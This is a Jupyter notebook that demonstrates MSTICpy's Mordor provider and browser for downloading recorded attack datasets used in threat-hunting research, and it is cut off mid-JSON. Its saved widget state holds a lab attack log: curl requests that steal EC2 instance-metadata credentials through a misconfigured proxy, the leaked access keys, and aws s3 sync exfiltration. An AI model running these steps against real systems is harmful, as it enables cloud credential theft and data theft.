{ "cells": [ { "cell_type": "markdown", "metadata": {}, "source": [ "# MSTICpy - Mordor data provider and browser\n", "\n", "### Description\n", "This notebook provides a guided example of using the Mordor data provider and browser included with MSTICpy.\n", "\n", "For more information on the Mordor data sets see the [Open Threat Research Forge Mordor GitHub repo](https://github.com/OTRF/mordor)\n", "\n", "### Contents:\n", "- Using the Mordor data provider to retrieve data sets\n", " - Listing queries\n", " - Running a query to retrieve data\n", " - Optional parameters\n", " - Searching for queries by Mordor property\n", "- Mordor Browser\n" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Using the Data Provider to download datasets\n", "\n", "Using the data provider you can download and render event data as a pandas DataFrame.\n", "\n", "> **Note** - Mordor includes both host event data and network capture data.
\n", "> Although Capture files can be downloaded and unpacked
\n", "> they currently cannot be populated into a pandas DataFrame.\n", "> This is the case for most `network` datasets.
\n", "> `Host` event data is retrieved and populated into DataFrames.\n" ] }, { "cell_type": "code", "execution_count": 12, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Retrieving Mitre data...\n", "Retrieving Mordor data...\n" ] } ], "source": [ "from msticpy.data import QueryProvider\n", "mdr_data = QueryProvider(\"Mordor\")\n", "mdr_data.connect()" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### List Queries\n", "\n", "> Note: Many Mordor data entries have multiple data sets, so we see more queries than Mordor entries.\n", "\n", "(Only first 15 shown)" ] }, { "cell_type": "code", "execution_count": 13, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "['small.aws.collection.ec2_proxy_s3_exfiltration',\n", " 'small.windows.collection.host.msf_record_mic',\n", " 'small.windows.credential_access.host.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges',\n", " 'small.windows.credential_access.host.empire_dcsync_dcerpc_drsuapi_DsGetNCChanges',\n", " 'small.windows.credential_access.host.empire_mimikatz_backupkeys_dcerpc_smb_lsarpc',\n", " 'small.windows.credential_access.host.empire_mimikatz_extract_keys',\n", " 'small.windows.credential_access.host.empire_mimikatz_logonpasswords',\n", " 'small.windows.credential_access.host.empire_mimikatz_lsadump_patch',\n", " 'small.windows.credential_access.host.empire_mimikatz_sam_access',\n", " 'small.windows.credential_access.host.empire_over_pth_patch_lsass',\n", " 'small.windows.credential_access.host.empire_powerdump_sam_access',\n", " 'small.windows.credential_access.host.empire_shell_reg_dump_sam',\n", " 'small.windows.credential_access.host.empire_shell_rubeus_asktgt_createnetonly',\n", " 'small.windows.credential_access.host.empire_shell_rubeus_asktgt_ptt',\n", " 'small.windows.credential_access.host.rdp_interactive_taskmanager_lsass_dump']" ] }, "execution_count": 13, "metadata": {}, "output_type": "execute_result" } ], "source": [ 
"mdr_data.list_queries()[:15]" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### Retrieving/querying a data set" ] }, { "cell_type": "code", "execution_count": 14, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip\n", "Extracting covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges_2020-08-05020926.json\n" ] }, { "data": { "text/html": [ "
" ], "text/plain": [ " @version Keywords ThreadID Version DestAddress \\\n", "0 1 -9214364837600034816 4888 1 239.255.255.250 \n", "1 1 -9223372036854775808 4452 2 NaN \n", "2 1 -9223372036854775808 4452 2 NaN \n", "\n", " host LayerRTID \\\n", "0 wec.internal.cloudapp.net 44.0 \n", "1 wec.internal.cloudapp.net NaN \n", "2 wec.internal.cloudapp.net NaN \n", "\n", " Message SourceModuleName \\\n", "0 The Windows Filtering Platform has permitted a... eventlog \n", "1 File created:\\r\\nRuleName: -\\r\\nUtcTime: 2020-... eventlog \n", "2 RawAccessRead detected:\\r\\nRuleName: -\\r\\nUtcT... eventlog \n", "\n", " SourceName ... Properties OperationType \\\n", "0 Microsoft-Windows-Security-Auditing ... NaN NaN \n", "1 Microsoft-Windows-Sysmon ... NaN NaN \n", "2 Microsoft-Windows-Sysmon ... NaN NaN \n", "\n", " QueryName QueryResults QueryStatus PipeName DisabledPrivilegeList \\\n", "0 NaN NaN NaN NaN NaN \n", "1 NaN NaN NaN NaN NaN \n", "2 NaN NaN NaN NaN NaN \n", "\n", " EnabledPrivilegeList ShareLocalPath RelativeTargetName \n", "0 NaN NaN NaN \n", "1 NaN NaN NaN \n", "2 NaN NaN NaN \n", "\n", "[3 rows x 145 columns]" ] }, "execution_count": 14, "metadata": {}, "output_type": "execute_result" } ], "source": [ "mdr_data.small.windows.credential_access.host.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges().head(3)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### Optional parameters\n", "\n", "The data provider and the query functions support some parameters to control\n", "aspects of the query operation.\n", "\n", "- **use_cached** : bool, optional
\n", " Try to use locally saved file first,\n", " by default True. If you’ve previously downloaded a file, it will use\n", " this rather than downloading a new copy.\n", "- **save_folder** : str, optional
\n", " Path to output folder, by default\n", " \".\". The path that downloaded and extracted files are saved to.\n", "- **silent** : bool
\n", " If True, suppress feedback. By default, False.\n", "\n", "If you specify these when you initialize the data provider, the settings\n", "will apply to all queries." ] }, { "cell_type": "code", "execution_count": 15, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Retrieving Mitre data...\n", "Retrieving Mordor data...\n" ] } ], "source": [ "mdr_data = QueryProvider(\"Mordor\", save_folder=\"./mordor\")\n", "mdr_data.connect()" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "Using these parameters in the query will override the provider settings\n", "and defaults for that query." ] }, { "cell_type": "code", "execution_count": 16, "metadata": {}, "outputs": [ { "data": { "text/html": [ "
" ], "text/plain": [ " @version Keywords ThreadID Version DestAddress \\\n", "0 1 -9214364837600034816 4888 1 239.255.255.250 \n", "1 1 -9223372036854775808 4452 2 NaN \n", "\n", " host LayerRTID \\\n", "0 wec.internal.cloudapp.net 44.0 \n", "1 wec.internal.cloudapp.net NaN \n", "\n", " Message SourceModuleName \\\n", "0 The Windows Filtering Platform has permitted a... eventlog \n", "1 File created:\\r\\nRuleName: -\\r\\nUtcTime: 2020-... eventlog \n", "\n", " SourceName ... Properties OperationType \\\n", "0 Microsoft-Windows-Security-Auditing ... NaN NaN \n", "1 Microsoft-Windows-Sysmon ... NaN NaN \n", "\n", " QueryName QueryResults QueryStatus PipeName DisabledPrivilegeList \\\n", "0 NaN NaN NaN NaN NaN \n", "1 NaN NaN NaN NaN NaN \n", "\n", " EnabledPrivilegeList ShareLocalPath RelativeTargetName \n", "0 NaN NaN NaN \n", "1 NaN NaN NaN \n", "\n", "[2 rows x 145 columns]" ] }, "execution_count": 16, "metadata": {}, "output_type": "execute_result" } ], "source": [ "mdr_data.small.windows.credential_access.host.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges(silent=True, save_folder=\"./mordor\").head(2)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Getting summary data about a query\n", "\n", "Call the query function with a single \"?\" parameter." ] }, { "cell_type": "code", "execution_count": 17, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Query: covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges\n", "Data source: Mordor\n", "Covenant DCSync\n", "\n", "Notes\n", "-----\n", "Mordor ID: SDWIN-200805020926\n", "This dataset represents adversaries abusing Active Directory Replication services to retrieve secret domain data (i.e. 
NTLM hashes) from domain accounts.\n", "\n", "Mitre Techniques: T1003: OS Credential Dumping\n", "Mitre Tactics: TA0006: Credential Access\n", "\n", "Parameters\n", "----------\n", "Query:\n", "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip\n" ] } ], "source": [ "mdr_data.small.windows.credential_access.host.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges(\"?\")" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### Searching for Queries with QueryProvider.search_queries()\n", "Search queries for matching attributes.\n", "\n", "#### Parameters\n", "\n", "**search** : str Search string. \n", "\n", "Substrings separated by commas will be treated as OR terms - e.g. \"a, b\" == \"a\" or \"b\".
\n", "Substrings separated by \"+\" will be treated as AND terms - e.g. \"a + b\" == \"a\" and \"b\"\n", "\n", "#### Returns\n", "List of matching query names." ] }, { "cell_type": "code", "execution_count": 18, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "['small.aws.collection.ec2_proxy_s3_exfiltration (AWS Cloud Bank Breach S3)']" ] }, "execution_count": 18, "metadata": {}, "output_type": "execute_result" } ], "source": [ "mdr_data.search_queries(\"AWS\")" ] }, { "cell_type": "code", "execution_count": 19, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "['small.windows.defense_evasion.host.empire_powerview_ldap_ntsecuritydescriptor (Empire Powerview Add-DomainObjectAcl)',\n", " 'small.windows.defense_evasion.network.empire_powerview_ldap_ntsecuritydescriptor (Empire Powerview Add-DomainObjectAcl)']" ] }, "execution_count": 19, "metadata": {}, "output_type": "execute_result" } ], "source": [ "mdr_data.search_queries(\"Empire + T1222\")" ] }, { "cell_type": "code", "execution_count": 20, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "['small.windows.credential_access.host.empire_mimikatz_lsadump_patch (Empire Mimikatz Lsadump LSA Patch)',\n", " 'small.windows.credential_access.host.empire_dcsync_dcerpc_drsuapi_DsGetNCChanges (Empire DCSync)',\n", " 'small.windows.credential_access.network.empire_dcsync_dcerpc_drsuapi_DsGetNCChanges (Empire DCSync)',\n", " 'small.windows.defense_evasion.host.empire_wdigest_downgrade.tar (Empire WDigest Downgrade)',\n", " 'small.windows.credential_access.host.empire_mimikatz_sam_access (Empire Mimikatz SAM Extract Hashes)',\n", " 'small.windows.credential_access.host.empire_mimikatz_logonpasswords (Empire Mimikatz LogonPasswords)']" ] }, "execution_count": 20, "metadata": {}, "output_type": "execute_result" } ], "source": [ "mdr_data.search_queries(\"Empire + Credential\")" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Mordor Browser\n", "\n", "We've also built a more specialized 
browser for Mordor data. This uses the metadata in the repository to let you view full details of the dataset.\n", "\n", "You can also preview the dataset (if it is convertible to a DataFrame).\n", "\n", "For details of the data shown please see the [Mordor GitHub repo](https://github.com/OTRF/mordor)
and the [Threat Hunter Playbook](https://threathunterplaybook.com/introduction.html)\n" ] }, { "cell_type": "code", "execution_count": 21, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Retrieving Mitre data...\n", "Retrieving Mordor data...\n" ] }, { "data": { "application/vnd.jupyter.widget-view+json": { "model_id": "8b1088fa20be4f0fafa3e8d3c549e60d", "version_major": 2, "version_minor": 0 }, "text/plain": [ "VBox(children=(VBox(children=(HTML(value='

Mordor dataset browser

'), Select(description='Data sets', l…" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": [ "

" ], "text/plain": [ "" ] }, "metadata": {}, "output_type": "display_data" } ], "source": [ "from msticpy.data.browsers.mordor_browser import MordorBrowser\n", "\n", "mdr_browser = MordorBrowser()" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### Mordor Browser Details\n", "The top scrollable list is a list of the Mordor datasets. Selecting one of these updates the data in the lower half of the browser.\n", "\n", "#### Filter Drop-down\n", "To narrow your search you can filter using a text search or filter by Mitre Attack Techniques or Tactics.\n", "- The Filter text box uses the same syntax as the provider `search_queries()` function.\n", " - A simple text string will find matches for datasets that contain this string\n", " - Strings separated by \",\" are treated as OR terms - i.e. it will match items that contain ANY of the substrings\n", " - Strings separated by \"+\" are treated as AND terms - i.e. it will match items that contain ALL of the substrings\n", "- The Mitre Techniques and Tactics lists are multi-select lists. Only items that have techniques and tactics matching\n", " the selected items will be shown.\n", "- The Reset Filter button clears any filtering.\n", "\n", "#### Main Details Window\n", "- title, ID, author, creation date, modification date and description are self-explanatory.\n", "- tags can be used for searching\n", "- file_paths (see below)\n", "- attacks - lists related Mitre Techniques and Tactics. The item title is a link to the Mitre page describing the technique or tactic.\n", "- notebooks - if there is a notebook in the Threat Hunter Playbook site, a link to it is shown here. 
(multiple notebooks might be shown)\n", "- simulation - raw data listing the steps in the attack (useful for replaying the attack in a demo environment).\n", "- references - links to any external data about the attack.\n", "\n", "#### File_paths\n", "This section allows you to select, download and (in most cases) display the event data relating to the attack.\n", "\n", "Select a file and click on the Download button.\n", "\n", "The zipped file is downloaded and extracted. If it is event data, this is converted to a\n", "pandas DataFrame and displayed below the rest of the data.\n", "\n", "The current dataset is available as an attribute of the browser:\n", "```\n", " mdr_browser.current_dataset\n", "```\n", "\n", "Datasets that you've downloaded and displayed in this session are also cached in the browser and available in the \n", "`mdr_browser.datasets` attribute.\n", "\n", "#### Downloaded files\n", "By default, files are downloaded and extracted to the current folder. You can change this with the\n", "`save_folder` parameter when creating the `MordorBrowser` object.\n", "\n", "You can also specify the `use_cached` parameter. By default, this is `True`, which causes downloaded files not\n", "to be deleted after extraction. These local copies are used if you try to view the same data set again.\n", "This also works across sessions.\n", "\n", "If `use_cached` is set to False, files are deleted immediately after downloading, extracting and populating the\n", "DataFrame." ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### Using the standard query browser\n", "\n", "> **Note** - In the `Example` section, ignore the examples of parameters
\n", "> passed to the query - these are not needed and ignored." ] }, { "cell_type": "code", "execution_count": 22, "metadata": {}, "outputs": [ { "data": { "application/vnd.jupyter.widget-view+json": { "model_id": "054b2f33184f4d5c8daa3456cbf25a60", "version_major": 2, "version_minor": 0 }, "text/plain": [ "VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": [ "


" ], "text/plain": [ "" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": [ "

AWS Cloud Bank Breach S3

Notes
Mordor ID: SDAWS-200914011940
This dataset represents adversaries abusing a misconfigured EC2 reverse proxy to obtain instance profile keys and eventually exfiltrate files from an S3 bucket.
Mitre Techniques: T1078: Valid Accounts, T1530: Data from Cloud Storage Object
Mitre Tactics: TA0001: Initial Access, TA0003: Persistence, TA0004: Privilege Escalation, TA0005: Defense Evasion, TA0009: Collection

Parameters


Query

https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/aws/collection/ec2_proxy_s3_exfiltration.zip

\n", "

Example

\n", "

{QueryProvider}[.QueryPath].QueryName(params...)

\n", "
qry_prov.small.aws.collection.ec2_proxy_s3_exfiltration(start=start, end=end, hostname=host)
\n", " " ], "text/plain": [ "" ] }, "metadata": {}, "output_type": "display_data" } ], "source": [ "mdr_data.browse_queries()" ] } ], "metadata": { "kernelspec": { "display_name": "Python (condadev)", "language": "python", "name": "condadev" }, "language_info": { "codemirror_mode": { "name": "ipython", "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", "pygments_lexer": "ipython3", "version": "3.6.10" }, "widgets": { "application/vnd.jupyter.widget-state+json": { "state": {
"33716f25ea6743798bfc1c7985b15b35": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_ac45c5eb72044ea7b5ea9972a9689fa4", "IPY_MODEL_60c77bd887e94f1eadfc172d87239b93" ], "layout": "IPY_MODEL_fbd378c0ef2e4dc9be8330bb8120f724" } }, "35454e40c4274824bef1570224e38d97": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "373a0836c6cd467892043018c97957d3": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "385886c636fc4a3ebba6d7433bacf137": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "tags", "layout": "IPY_MODEL_647f49b51caa47a7acc4adf675dfd47b", "style": "IPY_MODEL_21513f1b43734a47ad633209d05442f1", "value": "EC2 Proxy Abuse, S3 Data Exfiltration" } }, "3aeb90923fc448b9ad408592840224dc": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "Filter:", "layout": "IPY_MODEL_a2e96eefc5114fdca95a990b015031ce", "style": "IPY_MODEL_ed6812b281a444e8b320b86b520a993e" } }, "3b4c62c7679b47a6b0502a43cb3d53b2": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "modification_date", "layout": "IPY_MODEL_647f49b51caa47a7acc4adf675dfd47b", "style": "IPY_MODEL_63a6203566e9421d86229af44063e735", "value": "2020-09-13 00:00:00" } }, "3c83670a67f64f14a315906e595035c2": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "3da201ec0e6c4a4488cc7d6e9f5e1054": { "model_module": "@jupyter-widgets/controls", "model_module_version": 
"1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "3dd3958361f447be84ab38ea5701f571": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "3e1b33b35cc84887bd95e11bc00e3933": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "AccordionModel", "state": { "_titles": { "0": "Filters" }, "children": [ "IPY_MODEL_00f39a99d801432386985bbba8d91d3e" ], "layout": "IPY_MODEL_be7cc59a47014704ac98626c7fd932a7", "selected_index": null } }, "3e641eadea214ac9942ed005f61f2c5e": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_18b2b22895544665831e6b9e2448d268", "IPY_MODEL_98e7a335eb6942728df8ad89b9091b3d", "IPY_MODEL_f169ab2db4c64030b2179596d3ee6213" ], "layout": "IPY_MODEL_a45d771601644fea9c9f0391f705d28b" } }, "3e66b46fc13346358e05316f28219477": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "45165fcbf8164ce2b7ce062c507c806d": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "border": "1px solid", "margin": "5px", "padding": "10px", "width": "80%" } }, "49bca43be6a04bdb9c218a030d2144bf": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "LabelModel", "state": { "layout": "IPY_MODEL_0d2d30c344e74b6283f5d1461287d534", "style": "IPY_MODEL_ad9dfbe7ba9543358b103f86dc8f59d6", "value": " comma ORs values, '+' ANDs values" } }, "49d94d3dc9a84c1a89356a9e90b8275f": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Download", "layout": "IPY_MODEL_de91f0de57e54aa4a6179c752e52d3ac", "style": 
"IPY_MODEL_d5ebea2ba6cb4c999c2ca71bdd18a303" } }, "4cba7100a77d4a67a9e30740a047c57d": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_fa6daef63a734178baa4e1c093f31cbf", "IPY_MODEL_49d94d3dc9a84c1a89356a9e90b8275f" ], "layout": "IPY_MODEL_707d9649d0cc41f6a76df6f9cde75616" } }, "516c7ff671144ad495b4cf4a7aa53602": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_973b3cc26eb144178fbc3f5cd879acb5", "IPY_MODEL_1caba0145e3b4206bc10722de50e9d46", "IPY_MODEL_bc63213943704f288317b5d00cc19b0a", "IPY_MODEL_55f54dcaf30742e692568466063bb8ab", "IPY_MODEL_678bd81546ab45ebb4d708bc59ec37c3", "IPY_MODEL_e2bfded2a0ad4628a8106cad6144fabc", "IPY_MODEL_cbb5cc87c81a4f90b3fefa8baba81286", "IPY_MODEL_853e8ac9109545b6b0b0212e0a024e2e", "IPY_MODEL_33716f25ea6743798bfc1c7985b15b35", "IPY_MODEL_80595b0b60f5412ebc93246191b6e337", "IPY_MODEL_5b681178e5a0489299a4957ba1a6497b", "IPY_MODEL_5951e34d8aa0481ba5fed0fc7b6f3699", "IPY_MODEL_a70b0021bce34751b70575aa7498a372", "IPY_MODEL_e463e5729fc748d0bab3cf5891f1d76b" ], "layout": "IPY_MODEL_6573400329f84022af769bb793389703" } }, "52b24cb8d1f74e38a17455c6348de176": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "height": "300px", "width": "50%" } }, "558ea780be9242a99605ddc0b175b3f7": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HTMLModel", "state": { "description": "notebooks", "layout": "IPY_MODEL_647f49b51caa47a7acc4adf675dfd47b", "style": "IPY_MODEL_bf1a6fa8f4504720860c17624decbf02", "value": "
none" } }, "55f54dcaf30742e692568466063bb8ab": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "creation_date", "layout": "IPY_MODEL_1999c1cdc50c4520a537eb81bb8b03ca", "style": "IPY_MODEL_705f73c7e2404583b800026f6f76fb2f", "value": "2020-09-13 00:00:00" } }, "561949ffe1954ada877c9e9cb7185fc6": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "height": "300px", "width": "50%" } }, "5951e34d8aa0481ba5fed0fc7b6f3699": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextareaModel", "state": { "description": "simulation", "layout": "IPY_MODEL_c1901c134f6f467dba2fad20ada839ea", "style": "IPY_MODEL_aba795964a1040b79314d6a4bda98486", "value": "{'adversary_view': '> curl -s '\n 'http://35.174.154.220/latest/meta-data/iam/security-credentials/ '\n '-H '\n '\"Host:169.254.169.254\" \\n'\n 'MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 '\n '>\\n'\n '\\n'\n '> curl -s '\n 'http://35.174.154.220/latest/meta-data/iam/security-credentials/MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 '\n '-H \"Host:169.254.169.254\"\\n'\n '{\\n'\n '\"Code\" : \"Success\",\\n'\n '\"LastUpdated\" : \"2020-09-14T00:49:26Z\",\\n'\n '\"Type\" : \"AWS-HMAC\",\\n'\n '\"AccessKeyId\" : \"ASIA5FLZVX4OPVKKVBMX\",\\n'\n '\"SecretAccessKey\" : '\n '\"aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03\",\\n'\n '\"Token\" : \"TOKEN\",\\n'\n '\"Expiration\" : \"2020-09-14T07:10:27Z\"\\n'\n '}\\n'\n '\\n'\n '> aws configure --profile erratic\\n'\n 'AWS Access Key ID [None]: ASIA5FLZVX4OPVKKVBMX\\n'\n 'AWS Secret Access Key [None]: '\n 'aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03\\n'\n 'Default region name [None]: us-east-1\\n'\n 'Default output format [None]: json\\n'\n '\\n'\n '> echo aws_session_token = \"TOKEN\" >> ~/.aws/credentials \\n'\n '\\n'\n '> aws s3 ls --profile erratic\\n'\n '2020-09-13 20:00:32 '\n 
'mordorctstack-s3bucketforcloudtrail-1gj7vvt2ul642\\n'\n '2020-09-13 19:59:59 mordors3stack-s3bucket-llp2yingx64a\\n'\n '\\n'\n '> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile '\n 'erratic\\n'\n '2020-09-13 20:00:26 89 ring.txt\\n'\n '\\n'\n '> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile '\n 'erratic\\n'\n '2020-09-13 20:00:26 89 ring.txt\\n'\n '\\n'\n '> aws s3 sync s3://mordors3stack-s3bucket-llp2yingx64a . '\n '--profile erratic \\n'\n 'download: '\n 's3://mordors3stack-s3bucket-llp2yingx64a/ring.txt to '\n './ring.txt',\n 'environment': 'https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3',\n 'permissions_required': ['user'],\n 'tools': [{'module': 'Exfiltration',\n 'name': 'AWS CLI',\n 'script': 'https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3',\n 'type': 'Cloud Formation Templates'}]}" } }, "5b681178e5a0489299a4957ba1a6497b": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HTMLModel", "state": { "description": "notebooks", "layout": "IPY_MODEL_1999c1cdc50c4520a537eb81bb8b03ca", "style": "IPY_MODEL_bc4d326e33d14443a023cc32382e450d", "value": "
none" } }, "5e9884fbe358493aacea24c82b103c61": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "5eefece855c3492cb6343159719bd764": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "5f103a0dddbb430ba59b66d8131eb157": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectModel", "state": { "_options_labels": [ "small.aws.collection.ec2_proxy_s3_exfiltration", "small.windows.collection.host.msf_record_mic", "small.windows.credential_access.host.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges", "small.windows.credential_access.host.empire_dcsync_dcerpc_drsuapi_DsGetNCChanges", "small.windows.credential_access.host.empire_mimikatz_backupkeys_dcerpc_smb_lsarpc", "small.windows.credential_access.host.empire_mimikatz_extract_keys", "small.windows.credential_access.host.empire_mimikatz_logonpasswords", "small.windows.credential_access.host.empire_mimikatz_lsadump_patch", "small.windows.credential_access.host.empire_mimikatz_sam_access", "small.windows.credential_access.host.empire_over_pth_patch_lsass", "small.windows.credential_access.host.empire_powerdump_sam_access", "small.windows.credential_access.host.empire_shell_reg_dump_sam", "small.windows.credential_access.host.empire_shell_rubeus_asktgt_createnetonly", "small.windows.credential_access.host.empire_shell_rubeus_asktgt_ptt", "small.windows.credential_access.host.rdp_interactive_taskmanager_lsass_dump", "small.windows.credential_access.network.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges", "small.windows.credential_access.network.empire_dcsync_dcerpc_drsuapi_DsGetNCChanges", "small.windows.credential_access.network.empire_mimikatz_backupkeys_dcerpc_smb_lsarpc", "small.windows.credential_access.network.empire_shell_rubeus_asktgt_createnetonly", 
"small.windows.credential_access.network.empire_shell_rubeus_asktgt_ptt", "small.windows.defense_evasion.host.covenant_installutil", "small.windows.defense_evasion.host.empire_dllinjection_LoadLibrary_CreateRemoteThread", "small.windows.defense_evasion.host.empire_launcher_sct_regsvr32", "small.windows.defense_evasion.host.empire_monologue_netntlm_downgrade", "small.windows.defense_evasion.host.empire_powerview_ldap_ntsecuritydescriptor", "small.windows.defense_evasion.host.empire_psinject_PEinjection", "small.windows.defense_evasion.host.empire_enable_rdp.tar", "small.windows.defense_evasion.host.empire_wdigest_downgrade.tar", "small.windows.defense_evasion.network.empire_powerview_ldap_ntsecuritydescriptor", "small.windows.discovery.host.covenant_getdomaingroup_ldap_searchrequest_domain_admins", "small.windows.discovery.host.empire_find_localadmin_smb_svcctl_OpenSCManager", "small.windows.discovery.host.empire_getsession_dcerpc_smb_srvsvc_NetSessEnum", "small.windows.discovery.host.empire_shell_net_local_users", "small.windows.discovery.host.empire_shell_net_localgroup_administrators", "small.windows.discovery.host.empire_shell_rpc_samr_smb_group_domain_admins_standard_user", "small.windows.discovery.host.empire_shell_samr_EnumDomainUsers", "small.windows.discovery.network.covenant_getdomaingroup_ldap_searchrequest_domain_admins", "small.windows.discovery.network.empire_getsession_dcerpc_smb_srvsvc_NetSessEnum", "small.windows.discovery.network.empire_shell_rpc_samr_smb_group_domain_admins_standard_user", "small.windows.discovery.network.empire_shell_samr_EnumDomainUsers", "small.windows.execution.host.empire_launcher_vbs", "small.windows.lateral_movement.host.covenant_copy_smb_CreateRequest", "small.windows.lateral_movement.host.covenant_dcom_executeexcel4macro_allowed", "small.windows.lateral_movement.host.covenant_dcom_registerxll", "small.windows.lateral_movement.host.covenant_psremoting_command", 
"small.windows.lateral_movement.host.covenant_sc_query_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.covenant_sharpsc_create_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.covenant_sharpsc_query_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.covenant_sharpsc_start_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.covenant_sharpsc_stop_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.covenant_sharpwmi_create_dcerpc_wmi", "small.windows.lateral_movement.host.covenant_wmi_remote_event_subscription_ActiveScriptEventConsumers", "small.windows.lateral_movement.host.empire_dcom_shellwindows_stager", "small.windows.lateral_movement.host.empire_msbuild_dcerpc_wmi_smb", "small.windows.lateral_movement.host.empire_psexec_dcerpc_tcp_svcctl", "small.windows.lateral_movement.host.empire_psremoting_stager", "small.windows.lateral_movement.host.empire_shell_dcerpc_smb_service_dll_hijack", "small.windows.lateral_movement.host.empire_smbexec_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.empire_wmi_dcerpc_wmi_IWbemServices_ExecMethod", "small.windows.lateral_movement.host.empire_wmic_add_user_backdoor", "small.windows.lateral_movement.host.mimikatz_CVE-2020-1472_Unauthenticated_NetrServerAuthenticate2", "small.windows.lateral_movement.network.covenant_dcom_executeexcel4macro_allowed", "small.windows.lateral_movement.network.covenant_dcom_registerxll", "small.windows.lateral_movement.network.covenant_psremoting_command", "small.windows.lateral_movement.network.covenant_sc_query_dcerpc_smb_svcctl", 